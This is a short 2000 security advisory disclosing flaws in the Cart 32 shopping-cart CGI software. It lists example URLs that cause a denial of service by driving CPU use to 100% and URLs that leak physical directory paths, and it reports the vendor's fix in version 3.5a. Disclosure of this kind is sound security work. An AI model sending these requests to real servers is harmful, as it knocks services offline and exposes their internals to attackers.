Reported November 9, 2000 by Xato Network Security
DESCRIPTION DEMONSTRATION The denial of service is accomplished by entering the following url; http://www.example.com/cgi-bin/c32web.exe/ShowProgress This will cause CPU usage to jump to 100%. The second issue, information leakage displaying full physical paths of directories can be accomplished with the following URLs; http://www.example.com/cgi-bin/cart32.exe/error http://www.example.com/cgi-bin/c32web.exe/ShowAdminDir http://www.example.com/cgi-bin/c32web.exe/CheckError?error=53 VENDOR RESPONSE The Cart 32 team at McMurtrey/Whitaker & Associates has addressed these issues in the latest version 3.5a and has recommended that users read the knowledge base articles provided on their web site. http://www.cart32.com CREDIT |
Cart 32 Vulnerable to Information Leakage and DoS Attack
0 comments
Hide comments